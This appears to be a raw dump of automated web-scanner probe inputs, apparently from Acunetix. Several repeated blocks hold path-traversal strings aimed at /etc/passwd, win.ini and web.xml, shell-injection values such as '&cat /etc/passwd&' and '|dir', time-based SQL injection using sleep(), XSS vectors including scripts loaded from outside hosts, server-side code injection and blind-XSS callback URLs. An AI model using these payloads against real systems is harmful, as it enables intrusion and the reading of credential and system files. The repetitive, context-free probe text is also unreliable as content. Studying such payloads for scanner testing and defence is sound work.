../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<div style=width:expression(prompt(962877))>

1

1<iframe src='data:text/html

response.write(9827454*9107676)

1

1

1<body onload=prompt(948794)>

1

WEB-INF/web.xml

'+response.write(9827454*9107676)+'

&cat /etc/passwd&

1

1

WEB-INF\web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(988215)>

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9827454*9107676)+"

'&cat /etc/passwd&'

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1<img src=xyz OnErRor=prompt(978240)>

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1<img/src=">" onerror=alert(940827)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1

cat /etc/passwd

1

1

-1

1<ScRiPt%20>prompt(965803)</sCripT>

../../../../../../../../../../etc/passwd.jpg

1

1

`cat /etc/passwd`

1

1&lt

1

${100357+100323}

-1)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

|cat /etc/passwd#

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

\xf6<img acu onmouseover=prompt(951576) //\xf6>

-1))

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<input autofocus onfocus=prompt(957213)>

'|'ld

1

1

1some_inexistent_file_with_long_name%00.jpg

1

1&n961109=v996940

sQAM8jMf'

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

<a href='http://www.acunetix.com'>website security</a>

"|"ld

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

PjlVTgPz')

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

!(()&&!|*|*|

'"()

[url=http://www.acunetix.com]website security[/url]

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

testasp.vulnweb.com

YhmAg4xC'))

/etc/passwd

^(#$!@#$)(()))******

1

1_B7dLd <ScRiPt >prompt(949238)</ScRiPt>

'

'

1

1

-1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

"

"

1

1

-1)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

http://hit91otud3a5m.bxss.me/

1

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

acunetix_wvs_invalid_filename

1

-1))

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

&dir

1

${@print(md5(acunetix_wvs_security_test))}\

1

comments

1

zhB3jX7B'

1

'&dir&'

1

1

'"

comments

http://www.acunetix.tst

EsKXP4hS')

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

file:///etc/passwd

1

1

"&dir&"

1

comments/.

<!--

ABx0y5nG'))

1

1'"()&%<ScRiPt >prompt(932753)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

|dir

1

1

1

1

'"()&%<ScRiPt >prompt(986361)</ScRiPt>

WEB-INF/web.xml

'|dir

1

1

1

1

1

1_947958

WEB-INF\web.xml

"|dir

1

1

1

../../../../../../../../../../windows/win.ini

1

acu7579\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7579

1

1

1

../../../../../../../../../../boot.ini

1

1

1

1

acux4695\xc0\xbez1\xc0\xbcz2a\x90bcxuca4695

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<ScRiPt >prompt(973814)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<script>prompt(957556)</script>

................windowswin.ini

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(954257)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?931315></ScRiPt>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(977203)</ScRiPt>

1

1

1

response.write(9486595*9851573)

1<video><source onerror="javascript:prompt(964396)">

1

WEB-INF/web.xml

1

1

'+response.write(9486595*9851573)+'

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(952220)"></g></svg>

&cat /etc/passwd&

WEB-INF\web.xml

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9486595*9851573)+"

../../../../../../../../../../etc/passwd

1

'&cat /etc/passwd&'

1<div style=width:expression(prompt(926301))>

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

"&cat /etc/passwd&"

1

-1

SomeCustomInjectedHeader:injected_by_wvs

1

1<body onload=prompt(961534)>

1

../../../../../../../../../../etc/passwd.jpg

1

cat /etc/passwd

1

-1)

1

1

${99052+99182}

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(983036)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

`cat /etc/passwd`

-1))

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1<img src=xyz OnErRor=prompt(975488)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

|cat /etc/passwd#

9iWVDvjX'

1some_inexistent_file_with_long_name%00.jpg

1

1<img/src=">" onerror=alert(970105)>

1&n973117=v976504

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

'|'ld

)

bwsZh4dn')

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1<ScRiPt%20>prompt(997713)</sCripT>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"|"ld

1

1

!(()&&!|*|*|

z9ylXUDk'))

testasp.vulnweb.com

'"()

1&lt

/etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

^(#$!@#$)(()))******

'

'

-1

1

1

\xf6<img acu onmouseover=prompt(976996) //\xf6>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

"

"

-1)

1

1

1<input autofocus onfocus=prompt(974188)>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

||cat /etc/passwd

<a href='http://www.acunetix.com'>website security</a>

${@print(md5(acunetix_wvs_security_test))}

-1))

1

http://hitB955Q4kcch.bxss.me/

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

acunetix_wvs_invalid_filename

1

&dir

[url=http://www.acunetix.com]website security[/url]

1

${@print(md5(acunetix_wvs_security_test))}\

LsNrjsOs'

1

1

comments

1

'&dir&'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1_pkXnH <ScRiPt >prompt(971785)</ScRiPt>

WRnXYFSq')

1

http://www.acunetix.tst

file:///etc/passwd

comments

1

1

1

"&dir&"

1

1

pxyGnyC5'))

1

1

/\../\../\../\../\../\../\../etc/passwd

comments/.

1

|dir

'"

1'"()&%<ScRiPt >prompt(973745)</ScRiPt>

1

1

1

1

WEB-INF/web.xml

1

'|dir

<!--

1

'"()&%<ScRiPt >prompt(901027)</ScRiPt>

1

1

1

WEB-INF\web.xml

1

"|dir

1

1_997056

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

acu8093\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8093

1

../../../../../../../../../../boot.ini

1

acux4873\xc0\xbez1\xc0\xbcz2a\x90bcxuca4873

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(992645)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<script>prompt(933065)</script>

1

................windowswin.ini

1

1

1<ScRiPt >prompt(912098)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?932161></ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt >prompt(923224)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<video><source onerror="javascript:prompt(950320)">

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(951665)"></g></svg>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<div style=width:expression(prompt(920066))>

response.write(9270127*9399396)

1

1

1

&cat /etc/passwd&

1<iframe src='data:text/html

'+response.write(9270127*9399396)+'

1

1

1

WEB-INF/web.xml

1<body onload=prompt(969533)>

'&cat /etc/passwd&'

"+response.write(9270127*9399396)+"

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(918011)>

WEB-INF\web.xml

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

"&cat /etc/passwd&"

1

1

1<img src=xyz OnErRor=prompt(932777)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

cat /etc/passwd

1

1

1<img/src=">" onerror=alert(909984)>

../../../../../../../../../../etc/passwd.jpg

-1

SomeCustomInjectedHeader:injected_by_wvs

1

1

`cat /etc/passwd`

${100347+99211}

-1)

1

1<ScRiPt%20>prompt(987913)</sCripT>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|cat /etc/passwd#

1

1

1

-1))

1&lt

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1some_inexistent_file_with_long_name%00.jpg

1

'|'ld

1&n972001=v945767

vJq5DkOM'

1

\xf6<img acu onmouseover=prompt(955401) //\xf6>

)

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

1

1

4Flj29UR')

1

1<input autofocus onfocus=prompt(997961)>

1

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

testasp.vulnweb.com

<a href='http://www.acunetix.com'>website security</a>

FTC02UsD'))

1

^(#$!@#$)(()))******

1

'"()

/etc/passwd

1

'

'

[url=http://www.acunetix.com]website security[/url]

-1

1

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

"

1_arF3f <ScRiPt >prompt(953085)</ScRiPt>

-1)

1

1

1

1

1

||cat /etc/passwd

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

1

-1))

1

1

1

http://hitGJELHxiFZh.bxss.me/

&dir

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

1

9Cv8Jpi4'

acunetix_wvs_invalid_filename

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

'&dir&'

1

1

1

ni3drKeV')

comments

1

1

"&dir&"

file:///etc/passwd

1

comments

1

http://www.acunetix.tst

cTxMIMBt'))

'"

1'"()&%<ScRiPt >prompt(928095)</ScRiPt>

1

|dir

/\../\../\../\../\../\../\../etc/passwd

1

comments/.

1

1

'"()&%<ScRiPt >prompt(960390)</ScRiPt>

<!--

'|dir

1

WEB-INF/web.xml

1

1

1_988338

1

1

WEB-INF\web.xml

1

1

1

acu8366\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8366

1

1

"|dir

1

../../../../../../../../../../windows/win.ini

1

1

acux9927\xc0\xbez1\xc0\xbcz2a\x90bcxuca9927

1

1

1

../../../../../../../../../../boot.ini

1

1<ScRiPt >prompt(949208)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1<script>prompt(930242)</script>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(948223)</ScRiPt>

1

1

1

................windowswin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?916843></ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(919824)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<video><source onerror="javascript:prompt(945350)">

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(949401)"></g></svg>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<div style=width:expression(prompt(990799))>

1

response.write(9409789*9044976)

1

1

1

1<iframe src='data:text/html

1

1

'+response.write(9409789*9044976)+'

WEB-INF/web.xml

1<body onload=prompt(991486)>

&cat /etc/passwd&

1

"+response.write(9409789*9044976)+"

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(982080)>

1

'&cat /etc/passwd&'

1

../../../../../../../../../../etc/passwd

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=xyz OnErRor=prompt(981704)>

1

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<img/src=">" onerror=alert(930335)>

1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

-1)

1

1

${100076+99718}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1))

1<ScRiPt%20>prompt(975851)</sCripT>

1

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

1

1some_inexistent_file_with_long_name%00.jpg

ohSSkua9'

1&lt

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

8ipHvj3c')

1

1

1&n910405=v911624

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

\xf6<img acu onmouseover=prompt(936104) //\xf6>

'|'ld

1

15TiqcJg'))

"|"ld

)

1

1

testasp.vulnweb.com

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<input autofocus onfocus=prompt(996142)>

1

-1

!(()&&!|*|*|

'"()

http://testasp.vulnweb.com/t/xss.html?%00.jpg

<a href='http://www.acunetix.com'>website security</a>

1

/etc/passwd

1

-1)

^(#$!@#$)(()))******

'

1

'

1

[url=http://www.acunetix.com]website security[/url]

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

-1))

"

1

1

"

1

1_418VZ <ScRiPt >prompt(939881)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

ISeRKPza'

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

||cat /etc/passwd

1

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}

http://hitAG1bpTnuZR.bxss.me/

1

1

1

X3KDYZsz')

comments

&dir

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

SW2fOjoM'))

1

comments

'&dir&'

file:///etc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1'"()&%<ScRiPt >prompt(958046)</ScRiPt>

http://www.acunetix.tst

1

1

comments/.

"&dir&"

/\../\../\../\../\../\../\../etc/passwd

1

'"

1

1

1

1

1

|dir

WEB-INF/web.xml

<!--

1

'"()&%<ScRiPt >prompt(950515)</ScRiPt>

1

1

'|dir

WEB-INF\web.xml

1

1

1

1_977513

"|dir

1

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

1

acu8335\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8335

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acux4432\xc0\xbez1\xc0\xbcz2a\x90bcxuca4432

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(996807)</ScRiPt>

1

1

1

1<script>prompt(990695)</script>

................windowswin.ini

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(978045)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?997336></ScRiPt>

1

1

1<ScRiPt >prompt(931911)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<video><source onerror="javascript:prompt(991063)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(926653)"></g></svg>

1

response.write(9676008*9236665)

WEB-INF/web.xml

1

1

1<div style=width:expression(prompt(957820))>

'+response.write(9676008*9236665)+'

WEB-INF\web.xml

1

&cat /etc/passwd&

1

1

1<iframe src='data:text/html

"+response.write(9676008*9236665)+"

'&cat /etc/passwd&'

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

1<body onload=prompt(905809)>

"&cat /etc/passwd&"

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(969538)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

1

-1

1

SomeCustomInjectedHeader:injected_by_wvs

1

${99809+100470}

1<img src=xyz OnErRor=prompt(976508)>

1

`cat /etc/passwd`

1

../../../../../../../../../../etc/passwd.jpg

-1)

1

|cat /etc/passwd#

1

1

1<img/src=">" onerror=alert(994971)>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1))

1

'|'ld

)

1&n928675=v996490

1

1some_inexistent_file_with_long_name%00.jpg

1

1<ScRiPt%20>prompt(908905)</sCripT>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

3peIIbGk'

!(()&&!|*|*|

1

"|"ld

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1&lt

6ZlZaODB')

testasp.vulnweb.com

^(#$!@#$)(()))******

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

\xf6<img acu onmouseover=prompt(900398) //\xf6>

PHlBaxq5'))

1

1

1

'"()

'

'

1<input autofocus onfocus=prompt(957131)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

/etc/passwd

-1

1

1

1

1

"

"

1

<a href='http://www.acunetix.com'>website security</a>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1)

1

1

1

1

${@print(md5(acunetix_wvs_security_test))}

||cat /etc/passwd

1

[url=http://www.acunetix.com]website security[/url]

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1))

1

http://hitYPMiLpyX1A.bxss.me/

1

1

&dir

${@print(md5(acunetix_wvs_security_test))}\

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

acunetix_wvs_invalid_filename

1_ngCFa <ScRiPt >prompt(974207)</ScRiPt>

PMnDkvP0'

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

1

'&dir&'

1

OGew6RpN')

http://www.acunetix.tst

1

1

1

file:///etc/passwd

'"

"&dir&"

comments

0mhFyRcx'))

1

1

1'"()&%<ScRiPt >prompt(938146)</ScRiPt>

1

/\../\../\../\../\../\../\../etc/passwd

|dir

<!--

comments/.

1

1

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(975143)</ScRiPt>

1

'|dir

1

1

1

1

1

WEB-INF\web.xml

1_963325

"|dir

1

1

1

1

../../../../../../../../../../windows/win.ini

acu2787\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2787

1

1

1

1

../../../../../../../../../../boot.ini

1

1

1

acux6251\xc0\xbez1\xc0\xbcz2a\x90bcxuca6251

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(953403)</ScRiPt>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<script>prompt(967542)</script>

1

1

1

1<ScRiPt >prompt(945915)</ScRiPt>

1

................windowswin.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?990189></ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(909986)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<video><source onerror="javascript:prompt(908442)">

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(973255)"></g></svg>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<div style=width:expression(prompt(988119))>

response.write(9115169*9693819)

1

1

&cat /etc/passwd&

1

1<iframe src='data:text/html

'+response.write(9115169*9693819)+'

WEB-INF/web.xml

1

1

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

"+response.write(9115169*9693819)+"

1<body onload=prompt(926950)>

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

cat /etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(966471)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

`cat /etc/passwd`

-1

1<img src=xyz OnErRor=prompt(980766)>

1

1

1

../../../../../../../../../../etc/passwd.jpg

1

1

-1)

|cat /etc/passwd#

1<img/src=">" onerror=alert(998606)>

1

1

${99079+99843}

1&n994948=v917349

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1))

'|'ld

1

1

1<ScRiPt%20>prompt(997168)</sCripT>

1

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

0JLe8NEX'

"|"ld

1

)

1&lt

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

gDJd0zqR')

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'"()

!(()&&!|*|*|

\xf6<img acu onmouseover=prompt(988791) //\xf6>

testasp.vulnweb.com

'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

'

bJbifYXw'))

1

1

^(#$!@#$)(()))******

1<input autofocus onfocus=prompt(904447)>

1

"

/etc/passwd

1

1

"

-1

1

1

<a href='http://www.acunetix.com'>website security</a>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

1

acunetix_wvs_invalid_filename

||cat /etc/passwd

-1)

[url=http://www.acunetix.com]website security[/url]

1

http://hitrDDYPXXUVX.bxss.me/

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

comments

&dir

-1))

1

1_NNZ8f <ScRiPt >prompt(903892)</ScRiPt>

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

'&dir&'

comments

5lkemKIU'

1

1

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

"&dir&"

1

8mtXgSlz')

comments/.

1

1

http://www.acunetix.tst

file:///etc/passwd

1

|dir

1

0K3ZaKWE'))

1

1

'"

'|dir

1

/\../\../\../\../\../\../\../etc/passwd

1

1'"()&%<ScRiPt >prompt(945796)</ScRiPt>

1

1

1

<!--

"|dir

1

'"()&%<ScRiPt >prompt(906129)</ScRiPt>

WEB-INF/web.xml

1

1

1

1

1

1_961565

WEB-INF\web.xml

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

acu3016\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3016

1

1

1

../../../../../../../../../../boot.ini

acux10236\xc0\xbez1\xc0\xbcz2a\x90bcxuca10236

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(938935)</ScRiPt>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<script>prompt(914645)</script>

1

1

................windowswin.ini

1

1<ScRiPt >prompt(957528)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

